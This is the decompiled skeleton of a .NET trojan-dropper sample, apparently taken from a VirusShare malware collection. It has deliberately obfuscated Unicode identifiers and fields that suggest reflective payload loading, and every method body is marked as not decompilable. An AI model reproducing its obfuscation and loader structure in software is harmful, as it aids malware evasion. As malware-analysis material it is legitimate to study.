// Decompiled with JetBrains decompiler // Type: ꀍ璊⓰Ǐ㓯 // Assembly: scan, Version=, Culture=neutral, PublicKeyToken=null // MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe using System.Reflection; internal class ꀍ璊\uEC65\u24F0\uEA75Ǐ㓯\uE456 { public static string 䱚え烍滔\u0E6A艹\uFFFDꁰ; public static string \u2A1A\uE8C0䋃廉䃂뿞ṋ\u19FD; public static string 皖ຮ\uF0C7匚Ӟ䳎\uF0DD崪; public static byte[] 枓녈衞ᵍ㗵㩭\uE149撚; public static byte[] 煑벏\uA7C2\uAAF0텠杸쮭Ŋ; public static string[] \u0F3Cꮰ逢髈\uEA68泧緄಼; public static string 粧\u3261軮銸䁢\u2585\u28D0眛; public static MethodInfo \u2609Ԧ恆翼띹쫙䍫䍘; public static string 鄜뮨쭛\u0027塴ᬞ㒄Ⴧ; public static Assembly 덭줅䖄\u3192Ɋ뱮咠\uFFFD; private static void 샏舛\uF0A6\uFDD0崫让\u3353\u22A3() { // ISSUE: unable to decompile the method. } private static void \u0AE5䌸ㅏ̔ᴰ옰섃ⲳ() { // ISSUE: unable to decompile the method. } public static string 㥀ꕷĄ㕹礶驌墨\uFFFD(int _param0) { // ISSUE: unable to decompile the method. } public static byte[] 忹\uA7B8붂푴끺থ锚\uFFFD() { // ISSUE: unable to decompile the method. } private static void 砓裆\u2454貟赜夿襄죅() { // ISSUE: unable to decompile the method. } private static void 隂\uF5E4䝿㬕꣗嶖什酓(string _param0, object[] _param1) { // ISSUE: unable to decompile the method. } public static byte[] 딬猲ꉧ怪햇堫솰盺(byte[] _param0, string _param1) { // ISSUE: unable to decompile the method. } public ꀍ璊\uEC65\u24F0\uEA75Ǐ㓯\uE456() { // ISSUE: unable to decompile the method. } }